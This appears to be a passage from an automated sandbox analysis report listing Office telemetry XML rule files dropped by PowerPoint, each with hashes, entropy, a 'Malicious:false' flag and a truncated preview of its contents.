                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="241001" V="0" DC="SM" EN="Office.Security.Gen1ActivityAggregatedSuccessCountWithTag" ATT="05e0c2fd5fff432bac7a175220223da5-2eec7cb2-952b-4862-9fd4-16ed083da5ec-7364" DCa="PSU" xmlns="">.. <RIS>.. <RI N="ActivitySuccess" />.. </RIS>.. <S>.. <R T="1" R="241000" />.. <F T="2">.. <O T="EQ">.. <L>.. <S T="1" F="3" />.. </L>.. <R>.. <V V="true" T="B" />.. </R>.. </O>.. </F>.. <TI T="3" I="10min" />.. <A T="4" E="TelemetrySuspend" />.. <A T="5" E="TelemetryShutdown" />.. </S>.. <G I="true" R="TriggerOldest">.. <S T="2">.. <F N="5" />.. <F N="6" />.. <F N="9" />.. <F N="10" />.. </S>.. </G>.. <C T="FT" I="0" O="false" N="CollectionStartTime">.. <A T="MIN">.. <S T="2" F="0" />.. </A>.. </C>.. <C T="FT" I="1" O="false" N="CollectionEndTime">.. <A T="MAX">.. <S T="2" F="0" />.. </A>.. </C>.. <C T="W" I="2" O="false"
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2042
                                                                                                                              Entropy (8bit):4.6738198932573845
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9wQc10l94dk30cYIouyPiKpFYhLPD3RfT0cTqC8vwfu+cjcg:cCQICWW01uyPFYh900qLiWj
                                                                                                                              MD5:1D43589E7991AB7E7AFC439D344F3374
                                                                                                                              SHA1:E9F975987FCCF8A2643DF8679F2D89DE40C97990
                                                                                                                              SHA-256:4300831E9994F718EDD1A868B56292921E0FE3CE0C81DFFBB5C65412D40EABF5
                                                                                                                              SHA-512:D380FFC287C5323EA80D128FED7B39DE736FC99EFBC54B0FC8EA8294C44F5691B8DC016C23EBD268505C71518524F14F05ACBCD885A4BF401BD2F500D5C08C53
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="241002" V="0" DC="SM" EN="Office.Security.Gen1ActivityAggregatedFailureCount" ATT="05e0c2fd5fff432bac7a175220223da5-2eec7cb2-952b-4862-9fd4-16ed083da5ec-7364" DCa="PSU" xmlns="">.. <RIS>.. <RI N="ActivityFailure" />.. </RIS>.. <S>.. <R T="1" R="241000" />.. <F T="2">.. <O T="EQ">.. <L>.. <S T="1" F="3" />.. </L>.. <R>.. <V V="false" T="B" />.. </R>.. </O>.. </F>.. <TI T="3" I="30s" />.. <A T="4" E="TelemetrySuspend" />.. <A T="5" E="TelemetryShutdown" />.. </S>.. <G>.. <S T="2">.. <F N="4" />.. <F N="5" />.. <F N="6" />.. <F N="9" />.. <F N="10" />.. </S>.. </G>.. <C T="FT" I="0" O="false" N="CollectionStartTime">.. <A T="MIN">.. <S T="2" F="0" />.. </A>.. </C>.. <C T="FT" I="1" O="false" N="CollectionEndTime">.. <A T="MAX">.. <S T="2" F="0" />.. </A>.. </C>.. <C T="W" I="2" O="false" N="ActivityName"
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1535
                                                                                                                              Entropy (8bit):4.551500891656751
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dWmbSrGUrZBFJJKvsuKvCvKvg8PXfI8X1+:crSSUFBFJJ7u1vEI8l+
                                                                                                                              MD5:E3ABFD414A2BCBC7B5706BE2F917DC6D
                                                                                                                              SHA1:772C21DAE8B832BACA6CAB150F06B31D71D880E0
                                                                                                                              SHA-256:46374B5AA537CAA92286860C4C4C5E7BBB3A16CE42DC4285300452F6EAFD23AE
                                                                                                                              SHA-512:02C704EB8831FF7F84A858924C198250A6598B582C801273647C4F64DC058A1B2D8FE167A2EE514DEC04E4C3E9A612ED86F7D0361B9153F36CDFB451D8EFE78A
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="310000" V="1" DC="SM" EN="Office.Math.MathInputControlUsage" ATT="27999e6d11cf4453889db8cb19619c01-c4f52d34-766a-4af7-9d0c-368a3e4aeca6-6996" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bbb45" A="a6kho" />.. <UTS T="2" Id="bbb46" A="a6khp" />.. <TI T="3" I="Hourly" />.. <A T="4" E="TelemetrySuspend" />.. <A T="5" E="TelemetryShutdown" />.. <F T="6">.. <O T="EQ">.. <L>.. <S T="2" F="EventID" />.. </L>.. <R>.. <V V="3" T="U8" />.. </R>.. </O>.. </F>.. <F T="7">.. <O T="EQ">.. <L>.. <S T="2" F="EventID" />.. </L>.. <R>.. <V V="1" T="U8" />.. </R>.. </O>.. </F>.. <F T="8">.. <O T="EQ">.. <L>.. <S T="2" F="EventID" />.. </L>.. <R>.. <V V="2" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="FT" I="0" O="falseNoError" N="C
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1024
                                                                                                                              Entropy (8bit):4.983834335315003
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd51vSnpYoAQ8nerMer+erhSNXahISlVZLacSp9XS/xpMs3f7SVfO9N1xFzbrO:2dHvSrrzrRrpPXnRvD1bzPznCuE
                                                                                                                              MD5:834A80614C3867F58FDB4DFA3D0DD2EA
                                                                                                                              SHA1:742C669272B6391726FF9AA42EFF5C49D1FA2CB7
                                                                                                                              SHA-256:B453B9A3F3A521E2CCF8A60E8E1D553477EE046E9B41DD9F03E8F772BB4C26DB
                                                                                                                              SHA-512:7B09E2CFB4E230F6E34C85C1EB9B62AF6959A799C03CFBDA3E35AFE59FE33518DE6DC685D4203927F5D81B2B119ED7A28AC1F14E9B7CAE7F3DE118EF5730AFDB
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="320001" V="2" DC="SM" EN="Office.Extensibility.ODPActivationForTaga55rq" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" SP="CriticalBusinessImpact" DCa="DC PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="a55rq" />.. <UTS T="2" Id="c6io6" />.. <UTS T="3" Id="dfid5" />.. <US T="4">.. <S T="1" />.. <S T="2" />.. <S T="3" />.. </US>.. </S>.. <C T="FT" I="0" O="false" N="CollectionTime">.. <S T="4" F="TimeStamp100ns" />.. </C>.. <C T="U32" I="1" O="true" N="AssetId">.. <S T="4" F="AssetId" />.. </C>.. <C T="U32" I="2" O="true" N="AppInformation">.. <S T="4" F="AppInformation" />.. </C>.. <C T="I32" I="3" O="true" N="ErrorResult">.. <S T="4" F="ErrorResult" />.. </C>.. <C T="U32" I="4" O="true" N="NotificationFlags">.. <S T="4" F="NotificationFlags" />.. </C>.. <C T="W" I="5" O="true" N="AppInstanceId">.. <S T="4" F="AppInstanceId" />.. </C>.. <T>.. <S
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1558
                                                                                                                              Entropy (8bit):4.915226921571471
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd5FvWe6npYunerYferferK/NXahI0zcS+CTpk7t9zldsxOgCkp1x++66IHrnv:2d/vs6rYWrWrKQgqgm1GsChH4vZZWulm
                                                                                                                              MD5:20CE206C4C39A0FAC66DF790B89F6D38
                                                                                                                              SHA1:6BB5433364F561B6B11A4D0CF78DD00F60BC6E30
                                                                                                                              SHA-256:5EB15C22B0EAFF202899E125F6D53128ECC864F2A544F716862C5D4001B6A77B
                                                                                                                              SHA-512:72F8ABF5B6266F001F3DC7C0D09EAF9BB5453026FA635CBC1641E770835F2B24CDA29CB836E7A8C41561BACCB4437942CDE436E01173C9F9626F1E3D1E9FDE4F
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="320002" V="5" DC="SM" EN="Office.Extensibility.ODPActivationForTaga55rs" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" DCa="DC PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="a55rs" />.. <UTS T="2" Id="c6ipb" />.. <UTS T="3" Id="dfid7" />.. <US T="4">.. <S T="1" />.. <S T="2" />.. <S T="3" />.. </US>.. </S>.. <C T="U32" I="0" O="true" N="AssetId">.. <S T="4" F="AssetId" />.. </C>.. <C T="I32" I="1" O="true" N="SandboxCreationTime">.. <S T="4" F="SandboxCreationTime" M="Ignore" />.. </C>.. <C T="I32" I="2" O="true" N="PageLoadTime">.. <S T="4" F="PageLoadTime" M="Ignore" />.. </C>.. <C T="I32" I="3" O="true" N="AppStateTime">.. <S T="4" F="AppStateTime" M="Ignore" />.. </C>.. <C T="I32" I="4" O="true" N="AppInstallTime">.. <S T="4" F="AppInstallTime" M="Ignore" />.. </C>.. <C T="I32" I="5" O="true" N="ManifestDownloadTime">.. <S T="4" F="ManifestDownlo
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):810
                                                                                                                              Entropy (8bit):4.956671743952537
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd52+jnpYunerffer3er7NXahISlVZLacSp9yyfpxs3f7SVfO9NOBsu:2dgU6rururQPJvi
                                                                                                                              MD5:C4B59F2333CA9ADC12209F83BE2C8364
                                                                                                                              SHA1:563298D3DBDDF2759DBB9FEF3ACED35882CBBCC8
                                                                                                                              SHA-256:50BF0480B236CEA2B41890A2691DF1164283A75DCE699EB4BBA0E587EB64805B
                                                                                                                              SHA-512:0D4B4F667AE096B16AB66B9ED58417E6D9EAD7CF40B94893A01E455B408620E748154E5370ABD34668EA6764C3642AED1ACC7C8AE9A3BFAE13EDE5B97A0CFBBB
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="320003" V="1" DC="SM" EN="Office.Extensibility.ODPAppManagementMenu" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" DCa="DC PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="a55rr" />.. <UTS T="2" Id="c6io7" />.. <UTS T="3" Id="dfid6" />.. <US T="4">.. <S T="1" />.. <S T="2" />.. <S T="3" />.. </US>.. </S>.. <C T="FT" I="0" O="false" N="CollectionTime">.. <S T="4" F="TimeStamp100ns" />.. </C>.. <C T="U32" I="1" O="true" N="AssetId">.. <S T="4" F="AssetId" />.. </C>.. <C T="U32" I="2" O="true" N="OperationMetadata">.. <S T="4" F="OperationMetadata" />.. </C>.. <C T="I32" I="3" O="true" N="ErrorResult">.. <S T="4" F="ErrorResult" />.. </C>.. <T>.. <S T="4" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1633
                                                                                                                              Entropy (8bit):4.801127268927651
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dyErB5uM9vtYRE1uX+NDkQiTAoWfloMUw6NIP3:c5DugthuX+5wifRUw6uP3
                                                                                                                              MD5:7C58177810A5048EE7A9E46AEB00BA32
                                                                                                                              SHA1:B4DAD248437975C516B66C4B516DB5FE9915A7F3
                                                                                                                              SHA-256:D834A4BB538994AA7941256A96782E9C7A84ABACAF23C7C24AA01B40F314B960
                                                                                                                              SHA-512:74B437AA86FA0A0A48F7D18729076D7D52D36DC08A828D83FD39A06AE2BFB7C27F40855D9B50F10D17F680B3565A13E92B492C33C44C484F5FA9A89C2096C57E
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="320004" V="6" DC="SM" EN="Office.Extensibility.ODPLatency" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" SP="CriticalUsage" DCa="DC PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="ayc4y" />.. <F T="2">.. <O T="NE">.. <L>.. <S T="1" F="AppId" />.. </L>.. <R>.. <V V="b6d654a6-1a0a-4c6c-b5e8-edab9ddc7875" T="W" />.. </R>.. </O>.. </F>.. </S>.. <C T="U32" I="0" O="true" N="AssetId">.. <S T="1" F="AssetId" />.. </C>.. <C T="U32" I="1" O="true" N="AppInfo">.. <S T="1" F="AppInfo" />.. </C>.. <C T="I32" I="2" O="true" N="Stage1Time">.. <S T="1" F="Stage1Time" />.. </C>.. <C T="I32" I="3" O="true" N="Stage2Time">.. <S T="1" F="Stage2Time" />.. </C>.. <C T="I32" I="4" O="true" N="Stage3Time">.. <S T="1" F="Stage3Time" />.. </C>.. <C T="I32" I="5" O="true" N="Stage4Time">.. <S T="1" F="Stage4Time" />.. </C>.. <C T="I32" I="6
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1121
                                                                                                                              Entropy (8bit):4.884444624618638
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd5S1HTPnpYoAQBerjferTSerKfNXahISlVZL95YQwTSq7OryaDet8cS69UsBG:2diHTPwrSrTFr5PiTm8lKe++A1
                                                                                                                              MD5:E1437DDA496FDC0ACD47295942989EF1
                                                                                                                              SHA1:7B76A211FA74D5E2ECE17B6342D9FAC848306855
                                                                                                                              SHA-256:E46B25D8956615523742F67AC09FC1BE6F780C124237525CEEF4BF55E93B8081
                                                                                                                              SHA-512:FAF8DDF9826612ACC4FA017BC9F2FC3BD9B1ED70220646EC8BC04464465512CC6FDA896A6D90BF93E00D2F30B69FD116A1D02225F3AB4831D0814486404B5F7B
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="320005" V="3" DC="SM" EN="Office.Extensibility.RichApiMethodInvocation" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" SP="CriticalBusinessImpact" DCa="DC PSU" xmlns="">.. <S>.. <UTS T="1" Id="cp844" />.. <UTS T="2" Id="crm83" />.. <UTS T="3" Id="csuhi" />.. <US T="4">.. <S T="1" />.. <S T="2" />.. <S T="3" />.. </US>.. </S>.. <C T="FT" I="0" O="false" N="CollectionTime">.. <S T="4" F="TimeStamp100ns" />.. </C>.. <C T="G" I="1" O="false" N="ReqId">.. <S T="4" F="ReqId" />.. </C>.. <C T="G" I="2" O="false" N="TypeId">.. <S T="4" F="TypeId" />.. </C>.. <C T="I32" I="3" O="false" N="DispId">.. <S T="4" F="DispId" />.. </C>.. <C T="U8" I="4" O="false" N="DispFlag">.. <S T="4" F="DispFlag" />.. </C>.. <C T="I32" I="5" O="false" N="HResult">.. <S T="4" F="HResult" />.. </C>.. <C T="I64" I="6" O="false" N="Latency">.. <S T="4" F="Latency" />.. </C
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1194
                                                                                                                              Entropy (8bit):4.929111956214167
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dirKrrhrYlPqH1IJXvZvlzZv9CTSE+77znkGIGbF:ci8dcaYvZtzZ1CeE+L7IGJ
                                                                                                                              MD5:93AEE4A07A7A7445AB4E321AD6819A2D
                                                                                                                              SHA1:96FE87B687096F6C6B8C869A4F3207E516BFA635
                                                                                                                              SHA-256:6931738C7FA9145177933972C72EA5DB5DA5D5EAE73C8CA40DD57FF656D6C100
                                                                                                                              SHA-512:3DC962E112862EF7E33B810C518BA21EA05324A9912486837847EF51B96B52245B766823B930BED356FFE359B4B05EE3CC0A916923EBA58BFB0F48B775FF0DB1
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="320006" V="2" DC="SM" EN="Office.Extensibility.RichApiBatch" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" SP="CriticalBusinessImpact" DCa="DC PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="crm82" />.. <UTS T="2" Id="cou1d" />.. <US T="3">.. <S T="1" />.. <S T="2" />.. </US>.. </S>.. <C T="FT" I="0" O="false" N="CollectionTime">.. <S T="3" F="TimeStamp100ns" />.. </C>.. <C T="W" I="1" O="false" N="SolutionId">.. <S T="3" F="SolutionId" />.. </C>.. <C T="W" I="2" O="false" N="InstanceId">.. <S T="3" F="InstanceId" />.. </C>.. <C T="W" I="3" O="false" N="MarketplaceType">.. <S T="3" F="MarketplaceType" />.. </C>.. <C T="G" I="4" O="false" N="ReqId">.. <S T="3" F="ReqId" />.. </C>.. <C T="W" I="5" O="false" N="ReqType">.. <S T="3" F="ReqType" />.. </C>.. <C T="I64" I="6" O="false" N="ReqInitLatency">.. <S T="3" F="ReqInitLat" />.. </C>.. <C T="I64" I="7"
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):899
                                                                                                                              Entropy (8bit):4.972548927273034
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd5E8InpYoAQierJxNGAkd0QlXXwK+odNvAPxKfOb9sDp1N9LKMhUzPNO2su:2dqZrJxNGnnXs9+Tzrup
                                                                                                                              MD5:02B02C291E60D6E5C90358759D75A452
                                                                                                                              SHA1:C464921B23CBF46B038127D9ED1A2E81D7F336D5
                                                                                                                              SHA-256:3BCDD55FC4672FC39199C5C1053A04B047090C3A30FC48BC60A72FF2B543FDDB
                                                                                                                              SHA-512:AC36D47C8602189513AB9685D55A215D68859A63883D6A9CF296976B01C31AA26FB1D8D4FBFDCE7988B3EC612078500187B6C141E69692F0BF4CF0A2A6C24C8A
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="320007" V="2" DC="SM" EN="Office.Extensibility.ODPAppCommands" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bc4pv" A="a7x9h" />.. </S>.. <C T="W" I="0" O="false" N="SolutionId">.. <S T="1" F="SolutionId" />.. </C>.. <C T="W" I="1" O="false" N="RibbonId">.. <S T="1" F="RibbonId" />.. </C>.. <C T="I64" I="2" O="false" N="Groups">.. <S T="1" F="Groups" />.. </C>.. <C T="I64" I="3" O="false" N="Controls">.. <S T="1" F="Controls" />.. </C>.. <C T="I64" I="4" O="false" N="CustomTabs">.. <S T="1" F="CustomTabs" />.. </C>.. <C T="I64" I="5" O="false" N="Menus">.. <S T="1" F="Menus" />.. </C>.. <C T="I64" I="6" O="false" N="Context">.. <S T="1" F="Context" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):532
                                                                                                                              Entropy (8bit):5.248473934644969
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd5V8s5hnpYoAQ/nerJ/GAkOpfP5xNO2su:2djqrJ/G0p353
                                                                                                                              MD5:31011ADD1025FE6A82E707219144A7C9
                                                                                                                              SHA1:71BB48B43243EA38FF66E1B726FC3DAF454E042E
                                                                                                                              SHA-256:8C1C399CED544E47F0F61BA66C2AA4A9A70533ACAAAB4F56AE1AEA8C7B50A66E
                                                                                                                              SHA-512:17B6C40BC002B346B08F99DFF5EF325AE45743AD0115138BD37179EED5248BC819CC0E6BB55C3CF1F713FDB012E7D69264B8BAC292191ABD9C75BE2E6052BCED
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="320009" V="1" DC="SM" EN="Office.Extensibility.ODPAppCommandsRibbonClick" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" SP="CriticalBusinessImpact" DL="B" DCa="DC PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="bc4po" />.. </S>.. <C T="W" I="0" O="false" N="SolutionId">.. <S T="1" F="SolutionId" />.. </C>.. <C T="I32" I="1" O="false" N="CommandActionType">.. <S T="1" F="CommandActionType" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):567
                                                                                                                              Entropy (8bit):5.149485476742115
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd5s8anpYoAQ8nerVK7GAkfuwdyTPNO2su:2d8rrg7GvG
                                                                                                                              MD5:DC3DE5CF38ABE78497FD2033E8654DFC
                                                                                                                              SHA1:7A550CD312C595E6C8D344265D6AF41343893A49
                                                                                                                              SHA-256:93985861CC82DB4DEBD9F53688984520D5CBC1E711699D0AD27468494C271CDB
                                                                                                                              SHA-512:A0A3B573A424A6748EFCAD893CD108A353C53BE90621EDB98AE94D375666FB677EA057B60190017EB40396F9FE3E0277B88DEBF2187F8415A725606494A06FA7
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="320016" V="0" DC="SM" EN="Office.Extensibility.ODPAppCommandsCache" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" SP="CriticalBusinessImpact" DCa="DC PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="bk9r7" />.. </S>.. <C T="W" I="0" O="false" N="SolutionId">.. <S T="1" F="SolutionId" />.. </C>.. <C T="I64" I="1" O="false" N="Hr">.. <S T="1" F="Hr" />.. </C>.. <C T="W" I="2" O="false" N="Context">.. <S T="1" F="Context" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):526
                                                                                                                              Entropy (8bit):5.258568738062466
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd5gHn5hnpYoAQ8nerVGAkOpfP5xNO2su:2dCDrrVG0p353
                                                                                                                              MD5:F5A50841182A66E9F9E58F0DE749DC7A
                                                                                                                              SHA1:A27A65C6409225DB789DA541571DC33F61D5EA5F
                                                                                                                              SHA-256:1FF65FF05B8A6F336F695114314C36600ED57601E0A04D7204DDCA7EE9AD0EED
                                                                                                                              SHA-512:F312D23C3F28E663C29C660D9D12672849D3871836A8625887792BBFD79AC1C8C09397B0C39369DD421101D3AE4AC4F270E14C2CA9498AAFCC5561A32310BCB5
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="320021" V="0" DC="SM" EN="Office.Extensibility.ODPRibbonBridgeRibbonClick" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" SP="CriticalBusinessImpact" DCa="DC PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="bk9r8" />.. </S>.. <C T="W" I="0" O="false" N="SolutionId">.. <S T="1" F="SolutionId" />.. </C>.. <C T="I32" I="1" O="false" N="CommandActionType">.. <S T="1" F="CommandActionType" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):426
                                                                                                                              Entropy (8bit):5.304259006004121
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBd5umkJL3B/ED3BH3g0gZiRSjwRwRMFpAQ8nerhbMNkdxYJ1OSj4yNOn2sby:TMHd5uPEdnpYoAQ8neryAGAkNO2su
                                                                                                                              MD5:7560DB9FF06D4817E449C3864F0E78D9
                                                                                                                              SHA1:CDD27E0F285E66E884D84EC4A7359007963F4E85
                                                                                                                              SHA-256:BCE7D611AF817B982F14C330666DFAD379AD1CD6BFABF74F8D646A98F55D588B
                                                                                                                              SHA-512:37992956948CC0A79102C82561FB2EBF4E64D8639CD691B6414FDCEBAAF2D1B73B0787172391B49C285AA6BEB59D6B8F012AC9C607A08A6408E5944E35B0A64E
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="320022" V="0" DC="SM" EN="Office.Extensibility.ODPRecommendedGalleryClick" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" SP="CriticalBusinessImpact" DCa="DC PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="boktx" />.. </S>.. <C T="W" I="0" O="false" N="SolutionId">.. <S T="1" F="SolutionId" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):783
                                                                                                                              Entropy (8bit):5.090994225069874
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd5lIVnpYoAQ8nerwi9dPAstOHO8Hyfa/S+p1Dr7SRO9NO2su:2dUVrrwc412a641f7gOz
                                                                                                                              MD5:262ABB73CD87C2FDBA63244912C052F9
                                                                                                                              SHA1:F763B9D1F77A2282784D6D0AE894ECF239528D81
                                                                                                                              SHA-256:BBC6F47A32D8F295045828C08FEECA98A398DCD3148E9DE253838671E532ED81
                                                                                                                              SHA-512:E74BCA06D5F03A7058121AA4B0DB7EF4121D2AA131DF000789227DF4F5B5736E00D817E3A621F7014B28DA7EA029EAF0171C546B63D8DC3391BF0578F4557C66
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="320029" V="0" DC="SM" EN="Office.Extensibility.ODPSsoConsentDialog" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" SP="CriticalBusinessImpact" DCa="DC PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="bz504" />.. </S>.. <C T="W" I="0" O="false" N="CorrelationId">.. <S T="1" F="CorrelationId" />.. </C>.. <C T="W" I="1" O="false" N="AssetId">.. <S T="1" F="AssetId" />.. </C>.. <C T="I32" I="2" O="false" N="DialogCode">.. <S T="1" F="DialogCode" />.. </C>.. <C T="I32" I="3" O="false" N="LaunchingReason">.. <S T="1" F="LaunchingReason" />.. </C>.. <C T="I32" I="4" O="false" N="SSOConsentResult">.. <S T="1" F="SSOConsentResult" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):691
                                                                                                                              Entropy (8bit):5.1809592445794275
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd5d8FnpY9s18nerlUf7SE3fO9dLIAkdy9y1AuHnF1uM1SNO2su:2dQFWs13rqL2fcnjfo
                                                                                                                              MD5:EB99445E6A161551CCB659331552F5D9
                                                                                                                              SHA1:F5550984A01167FBAC0F7FBCB428595CAA3222E4
                                                                                                                              SHA-256:6911DD6727985AEF88A0431851BF669CCF362DEF18635AB056481B5879E96C84
                                                                                                                              SHA-512:D987332F767CEAFD747C95A7FECF21DBBE9822A6947D473ED6887DCE5EB6E954994F92A30DB94768BC986D7A27C7677ED4A3447CAFFF6F5EAC17789BD5AED473
                                                                                                                              Malicious:false
